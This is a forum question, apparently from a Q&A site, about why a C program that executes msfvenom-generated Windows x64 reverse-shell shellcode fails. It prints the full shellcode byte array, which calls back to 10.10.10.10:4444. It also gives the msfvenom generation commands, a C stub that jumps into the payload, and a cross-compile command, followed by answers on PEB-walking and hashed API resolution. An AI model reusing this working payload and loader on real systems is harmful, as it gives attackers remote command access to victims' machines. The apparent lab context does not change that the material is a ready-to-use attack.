# Shellcode cannot run from C program

Tags: c, windows, cross-compiling

I am trying to run this C code :

```
#include <stdio.h>
#include <string.h>

unsigned char code[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\x0a\x0a\x0a\x0a\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

int main(int argc, char **argv) {
  printf("Starting shellcode ......");
  int (*func)();
  func = (int (*)())code;
  int x = (int)(*func)();

  printf("result %i \n", x);
  return x;
}
```

The shellcode is made to create a reverse shell on `port 4444` and `IP 10.10.10.10`. I got it with the following command :

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f C
```

I compile it with :

```
x86_64-w64-mingw32-g++ bad_code.c -o simple.exe
```

When I transfer the file to my target VM (windows 10 64 bits) I get the message `"Starting shellcode ......"` but on my attacker machine I get nothing with `netcat`, meaning the shellcode is not running properly.

However if I run the exe from :

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > simple_noC.exe
```

everything works and I get my reverse shell. My theory is that something is wrong in my C program.

What is wrong in my C code ? Am I missing something ? Thanks for your help.

Comment: A .exe file has a complex structure, it's more than just a block of code you can jump into.

Comment: but isn't my cross compiler x86_64-w64-mingw32 supposed to correctly transform my C code to exe ?

Comment: Your testing has shown that your compiler is indeed creating a valid exe.  But read what I said again.  Windows does a lot of work to load that .exe into memory and call it, and you're bypassing all of it.

Comment: @rudeus123 exe is a file format that contains code (but not only), while you tried to use it as instructions code. (to rephrase @mark)

Comment: I am starting to understand, meaning just using a cross compiler to generate an exe from C is not enough, I need to do more things

Answer (score 0):

Creating a reverse shell requires usage of the OS API. Because of Address Space Layout Randomization ([ASLR](https://www.mandiant.com/resources/six-facts-about-address-space-layout-randomization-on-windows)) the addresses you rely on can change each time the OS restarts. For example if you call, `MessageBoxA` the loader will locate the import address of User32 as well as the offset to MessageBoxA which in turn points to the actual function in memory.

Now if you save that address address or call in a piece of shell to later load and run, you can not ensure that MessageBox will get executed. Simply because both the Import address of user32 can change as well as the function address in memory.

One way to resolve this would be for your shell to call `GetProcAddress` of course this is also unreliable because the location of kernel32 can change and so can the address of the function.

The ideal solution would be for your shell to behave as a sole executable which can resolve imports, load any dynamic libraries, and perform address rebasing in case the location of the module is unavailable.

Or You can resolve the address of kernel32 manually using Process Environment Block, then locate the address of your necessary functions by walking the import address table and comparing the function name hashes.